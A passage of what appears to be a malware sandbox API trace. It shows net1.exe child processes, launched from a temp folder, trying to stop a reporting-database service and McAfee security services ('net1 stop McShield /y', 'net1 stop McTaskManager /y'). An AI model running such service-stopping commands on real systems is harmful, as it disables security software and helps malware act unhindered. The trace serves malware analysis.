"c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0129.178] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x74) returned 0x21f658 [0129.178] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0129.178] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xefd84 | out: Buffer=0xefd84*=0x221af8) returned 0x0 [0129.178] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xefd84 | out: Buffer=0xefd84*=0x221b10) returned 0x0 [0129.178] _fileno (_File=0x77032900) returned -2 [0129.178] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0129.178] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0129.178] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0129.178] _wcsicmp (_String1="config", _String2="stop") returned -16 [0129.178] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0129.178] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0129.179] _wcsicmp (_String1="file", _String2="stop") returned -13 [0129.179] _wcsicmp (_String1="files", _String2="stop") returned -13 [0129.179] _wcsicmp (_String1="group", _String2="stop") returned -12 [0129.179] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0129.179] _wcsicmp (_String1="help", _String2="stop") returned -11 [0129.179] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0129.179] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0129.179] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0129.179] _wcsicmp (_String1="session", _String2="stop") returned -15 [0129.179] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0129.179] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0129.179] _wcsicmp (_String1="share", _String2="stop") returned -12 [0129.179] _wcsicmp (_String1="start", _String2="stop") returned -14 [0129.179] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0129.179] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0129.179] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0129.179] _wcsicmp (_String1="accounts", _String2="ReportServer$TPS") returned -17 [0129.179] _wcsicmp (_String1="computer", _String2="ReportServer$TPS") returned -15 [0129.179] _wcsicmp (_String1="config", _String2="ReportServer$TPS") returned -15 [0129.179] _wcsicmp (_String1="continue", _String2="ReportServer$TPS") returned -15 [0129.179] _wcsicmp (_String1="cont", _String2="ReportServer$TPS") returned -15 [0129.179] _wcsicmp (_String1="file", _String2="ReportServer$TPS") returned -12 [0129.179] _wcsicmp (_String1="files", _String2="ReportServer$TPS") returned -12 [0129.179] _wcsicmp (_String1="group", _String2="ReportServer$TPS") returned -11 [0129.179] _wcsicmp (_String1="groups", _String2="ReportServer$TPS") returned -11 [0129.179] _wcsicmp (_String1="help", _String2="ReportServer$TPS") returned -10 [0129.179] _wcsicmp (_String1="helpmsg", _String2="ReportServer$TPS") returned -10 [0129.179] _wcsicmp (_String1="localgroup", _String2="ReportServer$TPS") returned -6 [0129.179] _wcsicmp (_String1="pause", _String2="ReportServer$TPS") returned -2 [0129.179] _wcsicmp (_String1="session", _String2="ReportServer$TPS") returned 1 [0129.179] _wcsicmp (_String1="sessions", _String2="ReportServer$TPS") returned 1 [0129.179] _wcsicmp (_String1="sess", _String2="ReportServer$TPS") returned 1 [0129.179] _wcsicmp (_String1="share", _String2="ReportServer$TPS") returned 1 [0129.179] _wcsicmp (_String1="start", _String2="ReportServer$TPS") returned 1 [0129.179] _wcsicmp (_String1="stats", _String2="ReportServer$TPS") returned 1 [0129.179] _wcsicmp (_String1="statistics", _String2="ReportServer$TPS") returned 1 [0129.180] _wcsicmp (_String1="stop", _String2="ReportServer$TPS") returned 1 [0129.180] _wcsicmp (_String1="time", _String2="ReportServer$TPS") returned 2 [0129.180] _wcsicmp (_String1="user", _String2="ReportServer$TPS") returned 3 [0129.180] _wcsicmp (_String1="users", _String2="ReportServer$TPS") returned 3 [0129.180] _wcsicmp (_String1="msg", _String2="ReportServer$TPS") returned -5 [0129.180] _wcsicmp (_String1="messenger", _String2="ReportServer$TPS") returned -5 [0129.180] _wcsicmp (_String1="receiver", _String2="ReportServer$TPS") returned -13 [0129.180] _wcsicmp (_String1="rcv", _String2="ReportServer$TPS") returned -2 [0129.180] _wcsicmp (_String1="netpopup", _String2="ReportServer$TPS") returned -4 [0129.180] _wcsicmp (_String1="redirector", _String2="ReportServer$TPS") returned -12 [0129.180] _wcsicmp (_String1="redir", _String2="ReportServer$TPS") returned -12 [0129.180] _wcsicmp (_String1="rdr", _String2="ReportServer$TPS") returned -1 [0129.180] _wcsicmp (_String1="workstation", _String2="ReportServer$TPS") returned 5 [0129.180] _wcsicmp (_String1="work", _String2="ReportServer$TPS") returned 5 [0129.180] _wcsicmp (_String1="wksta", _String2="ReportServer$TPS") returned 5 [0129.180] _wcsicmp (_String1="prdr", _String2="ReportServer$TPS") returned -2 [0129.180] _wcsicmp (_String1="devrdr", _String2="ReportServer$TPS") returned -14 [0129.180] _wcsicmp (_String1="lanmanworkstation", _String2="ReportServer$TPS") returned -6 [0129.180] _wcsicmp (_String1="server", _String2="ReportServer$TPS") returned 1 [0129.180] _wcsicmp (_String1="svr", _String2="ReportServer$TPS") returned 1 [0129.180] _wcsicmp (_String1="srv", _String2="ReportServer$TPS") returned 1 [0129.180] _wcsicmp (_String1="lanmanserver", _String2="ReportServer$TPS") returned -6 [0129.180] _wcsicmp (_String1="alerter", _String2="ReportServer$TPS") returned -17 [0129.180] _wcsicmp (_String1="netlogon", _String2="ReportServer$TPS") returned -4 [0129.180] _wcsupr (in: _String="ReportServer$TPS" | out: _String="REPORTSERVER$TPS") returned="REPORTSERVER$TPS" [0129.181] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x225448 [0129.341] GetServiceKeyNameW (in: hSCManager=0x225448, lpDisplayName="REPORTSERVER$TPS", lpServiceName=0xe5aaf0, lpcchBuffer=0xefd20 | out: lpServiceName="", lpcchBuffer=0xefd20) returned 0 [0129.341] _wcsicmp (_String1="msg", _String2="REPORTSERVER$TPS") returned -5 [0129.341] _wcsicmp (_String1="messenger", _String2="REPORTSERVER$TPS") returned -5 [0129.341] _wcsicmp (_String1="receiver", _String2="REPORTSERVER$TPS") returned -13 [0129.341] _wcsicmp (_String1="rcv", _String2="REPORTSERVER$TPS") returned -2 [0129.341] _wcsicmp (_String1="redirector", _String2="REPORTSERVER$TPS") returned -12 [0129.341] _wcsicmp (_String1="redir", _String2="REPORTSERVER$TPS") returned -12 [0129.341] _wcsicmp (_String1="rdr", _String2="REPORTSERVER$TPS") returned -1 [0129.341] _wcsicmp (_String1="workstation", _String2="REPORTSERVER$TPS") returned 5 [0129.341] _wcsicmp (_String1="work", _String2="REPORTSERVER$TPS") returned 5 [0129.341] _wcsicmp (_String1="wksta", _String2="REPORTSERVER$TPS") returned 5 [0129.341] _wcsicmp (_String1="prdr", _String2="REPORTSERVER$TPS") returned -2 [0129.342] _wcsicmp (_String1="devrdr", _String2="REPORTSERVER$TPS") returned -14 [0129.342] _wcsicmp (_String1="lanmanworkstation", _String2="REPORTSERVER$TPS") returned -6 [0129.342] _wcsicmp (_String1="server", _String2="REPORTSERVER$TPS") returned 1 [0129.342] _wcsicmp (_String1="svr", _String2="REPORTSERVER$TPS") returned 1 [0129.342] _wcsicmp (_String1="srv", _String2="REPORTSERVER$TPS") returned 1 [0129.342] _wcsicmp (_String1="lanmanserver", _String2="REPORTSERVER$TPS") returned -6 [0129.342] _wcsicmp (_String1="alerter", _String2="REPORTSERVER$TPS") returned -17 [0129.342] _wcsicmp (_String1="netlogon", _String2="REPORTSERVER$TPS") returned -4 [0129.342] NetServiceControl (in: servername=0x0, service="REPORTSERVER$TPS", opcode=0x0, arg=0x0, bufptr=0xefd1c | out: bufptr=0xefd1c) returned 0x889 [0129.343] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0129.343] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0129.344] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0129.345] GetFileType (hFile=0x0) returned 0x0 [0129.345] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x223e68 [0129.345] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x223e68, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0129.345] WriteFile (in: hFile=0x0, lpBuffer=0x223e68, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xefc5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefc5c, lpOverlapped=0x0) returned 0 [0129.345] LocalFree (hMem=0x223e68) returned 0x0 [0129.345] GetFileType (hFile=0x0) returned 0x0 [0129.345] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x226110 [0129.345] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x226110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\"", lpUsedDefaultChar=0x0) returned 2 [0129.345] WriteFile (in: hFile=0x0, lpBuffer=0x226110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xefc5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefc5c, lpOverlapped=0x0) returned 0 [0129.345] LocalFree (hMem=0x226110) returned 0x0 [0129.345] _ultow (in: _Dest=0x889, _Radix=982156 | out: _Dest=0x889) returned="2185" [0129.345] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0129.346] GetFileType (hFile=0x0) returned 0x0 [0129.346] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x226110 [0129.346] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x226110, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0129.346] WriteFile (in: hFile=0x0, lpBuffer=0x226110, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xefc68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefc68, lpOverlapped=0x0) returned 0 [0129.346] LocalFree (hMem=0x226110) returned 0x0 [0129.346] GetFileType (hFile=0x0) returned 0x0 [0129.346] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x226110 [0129.346] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x226110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\"", lpUsedDefaultChar=0x0) returned 2 [0129.346] WriteFile (in: hFile=0x0, lpBuffer=0x226110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xefc68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefc68, lpOverlapped=0x0) returned 0 [0129.346] LocalFree (hMem=0x226110) returned 0x0 [0129.346] NetApiBufferFree (Buffer=0x221af8) returned 0x0 [0129.346] NetApiBufferFree (Buffer=0x221b10) returned 0x0 [0129.347] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$TPS /y" [0129.347] exit (_Code=2) Process: id = "318" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5278e000" os_pid = "0x790" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "192" os_parent_pid = "0x12e8" cmd_line = "C:\\Windows\\system32\\net1 stop McTaskManager /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 727 os_tid = 0xee0 [0129.050] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33fa1c | out: lpSystemTimeAsFileTime=0x33fa1c*(dwLowDateTime=0x20a873b0, dwHighDateTime=0x1d6f0d1)) [0129.050] GetCurrentProcessId () returned 0x790 [0129.050] GetCurrentThreadId () returned 0xee0 [0129.050] GetTickCount () returned 0x11537c3 [0129.050] QueryPerformanceCounter (in: lpPerformanceCount=0x33fa14 | out: lpPerformanceCount=0x33fa14*=24815092620) returned 1 [0129.050] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0129.050] __set_app_type (_Type=0x1) [0129.050] __p__fmode () returned 0x770331f4 [0129.050] __p__commode () returned 0x770331fc [0129.051] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0129.051] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0129.051] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.051] GetConsoleOutputCP () returned 0x1b5 [0129.051] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0129.051] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.054] sprintf_s (in: _DstBuf=0x33f9d4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0129.054] setlocale (category=0, locale=".437") returned="English_United States.437" [0129.056] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0129.057] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0129.057] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McTaskManager /y" [0129.057] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x33f7a0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0129.057] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x6e) returned 0x6f3ae0 [0129.057] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0129.057] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x33f9a4 | out: Buffer=0x33f9a4*=0x6f1ae8) returned 0x0 [0129.057] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x33f9a4 | out: Buffer=0x33f9a4*=0x6f1b00) returned 0x0 [0129.057] _fileno (_File=0x77032900) returned -2 [0129.057] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0129.057] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0129.057] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0129.057] _wcsicmp (_String1="config", _String2="stop") returned -16 [0129.057] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0129.057] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0129.057] _wcsicmp (_String1="file", _String2="stop") returned -13 [0129.057] _wcsicmp (_String1="files", _String2="stop") returned -13 [0129.057] _wcsicmp (_String1="group", _String2="stop") returned -12 [0129.057] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0129.057] _wcsicmp (_String1="help", _String2="stop") returned -11 [0129.057] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0129.057] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0129.057] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0129.058] _wcsicmp (_String1="session", _String2="stop") returned -15 [0129.058] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0129.058] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0129.058] _wcsicmp (_String1="share", _String2="stop") returned -12 [0129.058] _wcsicmp (_String1="start", _String2="stop") returned -14 [0129.058] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0129.058] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0129.058] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0129.058] _wcsicmp (_String1="accounts", _String2="McTaskManager") returned -12 [0129.058] _wcsicmp (_String1="computer", _String2="McTaskManager") returned -10 [0129.058] _wcsicmp (_String1="config", _String2="McTaskManager") returned -10 [0129.058] _wcsicmp (_String1="continue", _String2="McTaskManager") returned -10 [0129.058] _wcsicmp (_String1="cont", _String2="McTaskManager") returned -10 [0129.058] _wcsicmp (_String1="file", _String2="McTaskManager") returned -7 [0129.058] _wcsicmp (_String1="files", _String2="McTaskManager") returned -7 [0129.058] _wcsicmp (_String1="group", _String2="McTaskManager") returned -6 [0129.058] _wcsicmp (_String1="groups", _String2="McTaskManager") returned -6 [0129.058] _wcsicmp (_String1="help", _String2="McTaskManager") returned -5 [0129.058] _wcsicmp (_String1="helpmsg", _String2="McTaskManager") returned -5 [0129.058] _wcsicmp (_String1="localgroup", _String2="McTaskManager") returned -1 [0129.058] _wcsicmp (_String1="pause", _String2="McTaskManager") returned 3 [0129.058] _wcsicmp (_String1="session", _String2="McTaskManager") returned 6 [0129.058] _wcsicmp (_String1="sessions", _String2="McTaskManager") returned 6 [0129.058] _wcsicmp (_String1="sess", _String2="McTaskManager") returned 6 [0129.058] _wcsicmp (_String1="share", _String2="McTaskManager") returned 6 [0129.058] _wcsicmp (_String1="start", _String2="McTaskManager") returned 6 [0129.058] _wcsicmp (_String1="stats", _String2="McTaskManager") returned 6 [0129.058] _wcsicmp (_String1="statistics", _String2="McTaskManager") returned 6 [0129.058] _wcsicmp (_String1="stop", _String2="McTaskManager") returned 6 [0129.058] _wcsicmp (_String1="time", _String2="McTaskManager") returned 7 [0129.058] _wcsicmp (_String1="user", _String2="McTaskManager") returned 8 [0129.058] _wcsicmp (_String1="users", _String2="McTaskManager") returned 8 [0129.058] _wcsicmp (_String1="msg", _String2="McTaskManager") returned 16 [0129.058] _wcsicmp (_String1="messenger", _String2="McTaskManager") returned 2 [0129.058] _wcsicmp (_String1="receiver", _String2="McTaskManager") returned 5 [0129.059] _wcsicmp (_String1="rcv", _String2="McTaskManager") returned 5 [0129.059] _wcsicmp (_String1="netpopup", _String2="McTaskManager") returned 1 [0129.059] _wcsicmp (_String1="redirector", _String2="McTaskManager") returned 5 [0129.059] _wcsicmp (_String1="redir", _String2="McTaskManager") returned 5 [0129.059] _wcsicmp (_String1="rdr", _String2="McTaskManager") returned 5 [0129.059] _wcsicmp (_String1="workstation", _String2="McTaskManager") returned 10 [0129.059] _wcsicmp (_String1="work", _String2="McTaskManager") returned 10 [0129.059] _wcsicmp (_String1="wksta", _String2="McTaskManager") returned 10 [0129.059] _wcsicmp (_String1="prdr", _String2="McTaskManager") returned 3 [0129.059] _wcsicmp (_String1="devrdr", _String2="McTaskManager") returned -9 [0129.059] _wcsicmp (_String1="lanmanworkstation", _String2="McTaskManager") returned -1 [0129.059] _wcsicmp (_String1="server", _String2="McTaskManager") returned 6 [0129.059] _wcsicmp (_String1="svr", _String2="McTaskManager") returned 6 [0129.059] _wcsicmp (_String1="srv", _String2="McTaskManager") returned 6 [0129.059] _wcsicmp (_String1="lanmanserver", _String2="McTaskManager") returned -1 [0129.059] _wcsicmp (_String1="alerter", _String2="McTaskManager") returned -12 [0129.059] _wcsicmp (_String1="netlogon", _String2="McTaskManager") returned 1 [0129.059] _wcsupr (in: _String="McTaskManager" | out: _String="MCTASKMANAGER") returned="MCTASKMANAGER" [0129.059] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6f54b0 [0129.321] GetServiceKeyNameW (in: hSCManager=0x6f54b0, lpDisplayName="MCTASKMANAGER", lpServiceName=0xe5aaf0, lpcchBuffer=0x33f940 | out: lpServiceName="", lpcchBuffer=0x33f940) returned 0 [0129.322] _wcsicmp (_String1="msg", _String2="MCTASKMANAGER") returned 16 [0129.322] _wcsicmp (_String1="messenger", _String2="MCTASKMANAGER") returned 2 [0129.322] _wcsicmp (_String1="receiver", _String2="MCTASKMANAGER") returned 5 [0129.322] _wcsicmp (_String1="rcv", _String2="MCTASKMANAGER") returned 5 [0129.322] _wcsicmp (_String1="redirector", _String2="MCTASKMANAGER") returned 5 [0129.322] _wcsicmp (_String1="redir", _String2="MCTASKMANAGER") returned 5 [0129.322] _wcsicmp (_String1="rdr", _String2="MCTASKMANAGER") returned 5 [0129.322] _wcsicmp (_String1="workstation", _String2="MCTASKMANAGER") returned 10 [0129.322] _wcsicmp (_String1="work", _String2="MCTASKMANAGER") returned 10 [0129.322] _wcsicmp (_String1="wksta", _String2="MCTASKMANAGER") returned 10 [0129.322] _wcsicmp (_String1="prdr", _String2="MCTASKMANAGER") returned 3 [0129.322] _wcsicmp (_String1="devrdr", _String2="MCTASKMANAGER") returned -9 [0129.322] _wcsicmp (_String1="lanmanworkstation", _String2="MCTASKMANAGER") returned -1 [0129.322] _wcsicmp (_String1="server", _String2="MCTASKMANAGER") returned 6 [0129.322] _wcsicmp (_String1="svr", _String2="MCTASKMANAGER") returned 6 [0129.322] _wcsicmp (_String1="srv", _String2="MCTASKMANAGER") returned 6 [0129.322] _wcsicmp (_String1="lanmanserver", _String2="MCTASKMANAGER") returned -1 [0129.322] _wcsicmp (_String1="alerter", _String2="MCTASKMANAGER") returned -12 [0129.322] _wcsicmp (_String1="netlogon", _String2="MCTASKMANAGER") returned 1 [0129.322] NetServiceControl (in: servername=0x0, service="MCTASKMANAGER", opcode=0x0, arg=0x0, bufptr=0x33f93c | out: bufptr=0x33f93c) returned 0x889 [0129.324] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0129.324] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0129.325] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0129.326] GetFileType (hFile=0x0) returned 0x0 [0129.326] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6f3ed0 [0129.326] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6f3ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0129.326] WriteFile (in: hFile=0x0, lpBuffer=0x6f3ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x33f87c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33f87c, lpOverlapped=0x0) returned 0 [0129.326] LocalFree (hMem=0x6f3ed0) returned 0x0 [0129.326] GetFileType (hFile=0x0) returned 0x0 [0129.326] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6f6178 [0129.326] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6f6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\no", lpUsedDefaultChar=0x0) returned 2 [0129.326] WriteFile (in: hFile=0x0, lpBuffer=0x6f6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x33f87c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33f87c, lpOverlapped=0x0) returned 0 [0129.326] LocalFree (hMem=0x6f6178) returned 0x0 [0129.326] _ultow (in: _Dest=0x889, _Radix=3405996 | out: _Dest=0x889) returned="2185" [0129.326] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0129.326] GetFileType (hFile=0x0) returned 0x0 [0129.326] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6f6178 [0129.326] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6f6178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0129.327] WriteFile (in: hFile=0x0, lpBuffer=0x6f6178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x33f888, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33f888, lpOverlapped=0x0) returned 0 [0129.327] LocalFree (hMem=0x6f6178) returned 0x0 [0129.327] GetFileType (hFile=0x0) returned 0x0 [0129.327] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6f6178 [0129.327] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6f6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\no", lpUsedDefaultChar=0x0) returned 2 [0129.327] WriteFile (in: hFile=0x0, lpBuffer=0x6f6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x33f888, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33f888, lpOverlapped=0x0) returned 0 [0129.327] LocalFree (hMem=0x6f6178) returned 0x0 [0129.327] NetApiBufferFree (Buffer=0x6f1ae8) returned 0x0 [0129.327] NetApiBufferFree (Buffer=0x6f1b00) returned 0x0 [0129.327] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McTaskManager /y" [0129.327] exit (_Code=2) Process: id = "319" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x523a2000" os_pid = "0x1290" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "189" os_parent_pid = "0x12c4" cmd_line = "C:\\Windows\\system32\\net1 stop McShield /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 728 os_tid = 0xeec [0129.086] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xef8c4 | out: lpSystemTimeAsFileTime=0xef8c4*(dwLowDateTime=0x20ad3670, dwHighDateTime=0x1d6f0d1)) [0129.086] GetCurrentProcessId () returned 0x1290 [0129.086] GetCurrentThreadId () returned 0xeec [0129.086] GetTickCount () returned 0x11537e3 [0129.086] QueryPerformanceCounter (in: lpPerformanceCount=0xef8bc | out: lpPerformanceCount=0xef8bc*=24818728249) returned 1 [0129.087] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0129.138] __set_app_type (_Type=0x1) [0129.139] __p__fmode () returned 0x770331f4 [0129.139] __p__commode () returned 0x770331fc [0129.139] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0129.139] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0129.139] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.139] GetConsoleOutputCP () returned 0x1b5 [0129.140] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0129.140] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.143] sprintf_s (in: _DstBuf=0xef87c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0129.144] setlocale (category=0, locale=".437") returned="English_United States.437" [0129.146] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0129.146] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0129.146] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McShield /y" [0129.146] 